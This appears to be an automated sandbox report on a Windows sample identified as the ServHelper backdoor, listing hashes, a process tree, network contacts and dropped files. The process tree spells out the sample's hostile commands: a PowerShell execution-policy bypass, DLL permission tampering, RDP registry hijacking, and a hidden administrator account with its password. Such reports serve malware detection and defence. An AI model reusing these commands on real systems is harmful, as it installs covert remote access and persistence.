Analysis

  • max time kernel
    142s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    03-05-2022 19:24

General

  • Target

    4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe

  • Size

    3.2MB

  • MD5

    337e4fd5e423ee5e716ed7ee270bcd00

  • SHA1

    6390cf1f9b5a7e5dc3494d603c634e8b5c9b6233

  • SHA256

    4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398

  • SHA512

    e44814ffdfda11c7f2461b3ec8fa587bf2ca28b8f48b28a9bf103d5a3faf3e5293995c88e8e625eb71f856b5e5160f52ef011a5decd3acd4b1029aa63591e724

Malware Config

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe
    "C:\Users\Admin\AppData\Local\Temp\4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1632
    • \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3916
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3796
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB693.tmp" "c:\Users\Admin\AppData\Local\Temp\lvlowopo\CSC23AAE9E7F60A486E9411445B2152B32A.TMP"
          4⤵
            PID:1500
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4200
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5032
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4752
        • C:\Windows\system32\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:964
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2952
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:3576
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4984
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4160
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4332
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4248
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2444
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:2868
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:4440
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:2392
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3664
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:4816
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4972
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2600
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5064
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:1608
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1848
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4580
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1016
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:5056
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:1616
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:2824
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc 000000 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3708
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc 000000 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3928
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                        3⤵
                          PID:2488
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc pd21abwo /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4936
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc pd21abwo /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2844
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc pd21abwo /add
                          3⤵
                            PID:1712
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                          PID:3952
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                            2⤵
                              PID:4952
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                3⤵
                                  PID:3316
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
                              1⤵
                                PID:5060
                                • C:\Windows\system32\net.exe
                                  net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
                                  2⤵
                                    PID:204
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
                                      3⤵
                                        PID:872
                                  • C:\Windows\System32\cmd.exe
                                    cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                    1⤵
                                      PID:3040
                                      • C:\Windows\system32\net.exe
                                        net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                        2⤵
                                          PID:3248
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                            3⤵
                                              PID:1384
                                        • C:\Windows\System32\cmd.exe
                                          cmd /C net.exe user WgaUtilAcc pd21abwo
                                          1⤵
                                            PID:3264
                                            • C:\Windows\system32\net.exe
                                              net.exe user WgaUtilAcc pd21abwo
                                              2⤵
                                                PID:4008
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 user WgaUtilAcc pd21abwo
                                                  3⤵
                                                    PID:2516

                                              Network

                                              • flag-us
                                                DNS
                                                96.108.152.52.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                96.108.152.52.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                DNS
                                                petrovich.xyz
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                petrovich.xyz
                                                IN A
                                                Response
                                                petrovich.xyz
                                                IN A
                                                188.114.97.0
                                                petrovich.xyz
                                                IN A
                                                188.114.96.0
                                              • 88.221.144.179:80
                                                322 B
                                                7
                                              • 88.221.144.179:80
                                                322 B
                                                7
                                              • 13.89.178.26:443
                                                322 B
                                                7
                                              • 188.114.97.0:443
                                                petrovich.xyz
                                                tls, https
                                                1.5kB
                                                6.2kB
                                                15
                                                17
                                              • 67.26.203.254:80
                                                46 B
                                                40 B
                                                1
                                                1
                                              • 8.8.8.8:53
                                                96.108.152.52.in-addr.arpa
                                                dns
                                                72 B
                                                146 B
                                                1
                                                1

                                                DNS Request

                                                96.108.152.52.in-addr.arpa

                                              • 8.8.8.8:53
                                                petrovich.xyz
                                                dns
                                                59 B
                                                91 B
                                                1
                                                1

                                                DNS Request

                                                petrovich.xyz

                                                DNS Response

                                                188.114.97.0
                                                188.114.96.0

                                              MITRE ATT&CK Enterprise v6

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                Filesize

                                                54KB

                                                MD5

                                                5f612d9087b8bcadb4002e6b026990e8

                                                SHA1

                                                b5f343e569abb0849c06e3d77d00cc1bd2d5f589

                                                SHA256

                                                838be164025509d2c4dd005aabf7bbca522b703e931d9c21fb287b5f06178450

                                                SHA512

                                                d5e3e0eeb9b4d3f7ceeba19bc83669258d77d6f973e90049d8cb2796e3f0f6502209e1863ba0a0c7d69b1cc3c0a43e74b9efd0557854ac349f3ffc51d6ea1c59

                                              • C:\Users\Admin\AppData\Local\Temp\RESB693.tmp

                                                Filesize

                                                1KB

                                                MD5

                                                c439285bbde55b677c096447745ccd29

                                                SHA1

                                                ffec0b5e55ed349b6b9938a8e4a04767d50c3ff1

                                                SHA256

                                                c674812c663d4cdf0e8e0d18dc54f291079d206332a96a857512ccaa71330061

                                                SHA512

                                                be41a39cf6507d4684f0243262ba98893b8eadde92363fadb82cd3a63a04ef443c0e4e0c4caf7f55ab9560d7dfc672d8172f79fdbe17a686d82ba85cf77c2f87

                                              • C:\Users\Admin\AppData\Local\Temp\get-points.ps1

                                                Filesize

                                                3.0MB

                                                MD5

                                                031d92d079edd02c5f34248e9bf03ff6

                                                SHA1

                                                736e40d6cde2566fb5d976cb1d7172e6acb8bd12

                                                SHA256

                                                ab89298954e80cea1c73937cb628874832ab9d45c6d3be9dde40c4a4aae82ad2

                                                SHA512

                                                5bf6934556f451d35303e50e03b5a74a4b74d58b836f15c3cc3356b0b9e1a2bff6867153c63537f5fc942d346850bc9d2a34cf509d6c5b4d13d9021eefce39f5

                                              • C:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.dll

                                                Filesize

                                                3KB

                                                MD5

                                                cb9e39baafea02d62d0c9252a81e8e7c

                                                SHA1

                                                ce60b8f72ed39b8b78af22be04cbbe7ff5b85d77

                                                SHA256

                                                251c5247ede2f35abe3c3ff497a0a2dd8a4081371ceefa28120556722e9009b2

                                                SHA512

                                                5c9eba6ae4c8a559fe72a48329d49fa057926f28be5737cab07b2a0524c035975d518cc294d14809ddc9ef3f3484f4233f9388b63ea127edd82e9ef48c986db3

                                              • C:\Windows\Branding\mediasrv.png

                                                Filesize

                                                54KB

                                                MD5

                                                40bf8ddb2544e110ff0f368fdb0f34ba

                                                SHA1

                                                a9a0ed994500563a1b45b7748d76ab522d9f870f

                                                SHA256

                                                21bebaf9f55e1288bea72cf10645536d3b62599973cb48adb3f4d3c9e0d450a7

                                                SHA512

                                                8e3583b868d3a9ac1f992dfa555fe2ab60934ff76e35c751b8e8ca13d94ded40e02f47ff9074c19fea48bf68a02e21fef87c0b75a385aae53d41184b475e7ac5

                                              • C:\Windows\Branding\mediasvc.png

                                                Filesize

                                                944KB

                                                MD5

                                                dc99adf951d836bbac2b6e729555c3b7

                                                SHA1

                                                f3c6f96a3ae48e4048771bc070f427c0d7353d60

                                                SHA256

                                                0157d803e2b1b8a43236d08aa8f8f80d3afd629d822bb901fb712192e7aa90be

                                                SHA512

                                                3eff38448e3a5b9328643e1f96873c126b470ec4d576f5504f8c1abe1bf6800b662cd97d12979cdffdca13e9410a01a5390a2dd0f27b9c9a0c083d953690955f

                                              • C:\Windows\system32\rfxvmt.dll

                                                Filesize

                                                40KB

                                                MD5

                                                dc39d23e4c0e681fad7a3e1342a2843c

                                                SHA1

                                                58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                SHA256

                                                6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                SHA512

                                                5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                              • \??\c:\Users\Admin\AppData\Local\Temp\lvlowopo\CSC23AAE9E7F60A486E9411445B2152B32A.TMP

                                                Filesize

                                                652B

                                                MD5

                                                bf64c714dc1375e66b9e64e2b54cd4c5

                                                SHA1

                                                579f954358037eb68c91dcaafcf2ef394d11d04d

                                                SHA256

                                                d8ae1460c1acea4ba0ad40432d81119004e7e2ad4d7d035e696d6a41a522fb23

                                                SHA512

                                                abecf88ab8fdd7bfc115b277260d554a011594bb62078d919501118b48f7ee5b5ce8a48963f4aebe00db84a0f1488176594d502010ce94cdcd9d10c9dbe86a77

                                              • \??\c:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.0.cs

                                                Filesize

                                                504B

                                                MD5

                                                8e55cb0ca998472ab6d3e295e0c4dd50

                                                SHA1

                                                407d07a29b89fc3afc246c0680d5857e3f51019d

                                                SHA256

                                                63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

                                                SHA512

                                                c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

                                              • \??\c:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.cmdline

                                                Filesize

                                                369B

                                                MD5

                                                12524ccc3bc37bbe35e7b5963d148cfa

                                                SHA1

                                                6a7b17fd989b22ad6b88607f03ed0b8e86e77439

                                                SHA256

                                                59b6b333ee73158564f2df7b5b493623930ef1f2affd9e50afcb60d9db6ab722

                                                SHA512

                                                8357b5f82c51d908986db8b1a5e2b6e0c782c2ec3848856183d706336ba0e2e8fc7458410febc195de464a32d76d4042132ae8706a59aa69abed8d65ba82944f

                                              • memory/3916-134-0x00007FFAB72A0000-0x00007FFAB7D61000-memory.dmp

                                                Filesize

                                                10.8MB

                                              • memory/3916-132-0x000002BE55880000-0x000002BE558C4000-memory.dmp

                                                Filesize

                                                272KB

                                              • memory/3916-142-0x000002BE5DEB0000-0x000002BE5E026000-memory.dmp

                                                Filesize

                                                1.5MB

                                              • memory/3916-184-0x000002BE55CE0000-0x000002BE55D56000-memory.dmp

                                                Filesize

                                                472KB

                                              • memory/3916-143-0x000002BE5E240000-0x000002BE5E44A000-memory.dmp

                                                Filesize

                                                2.0MB

                                              • memory/3916-131-0x000002BE54390000-0x000002BE543B2000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/4200-145-0x00007FFAB72A0000-0x00007FFAB7D61000-memory.dmp

                                                Filesize

                                                10.8MB

                                              • memory/4752-149-0x00007FFAB72A0000-0x00007FFAB7D61000-memory.dmp

                                                Filesize

                                                10.8MB

                                              • memory/5032-148-0x00007FFAB72A0000-0x00007FFAB7D61000-memory.dmp

                                                Filesize

                                                10.8MB

                                              We care about your privacy.

                                              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.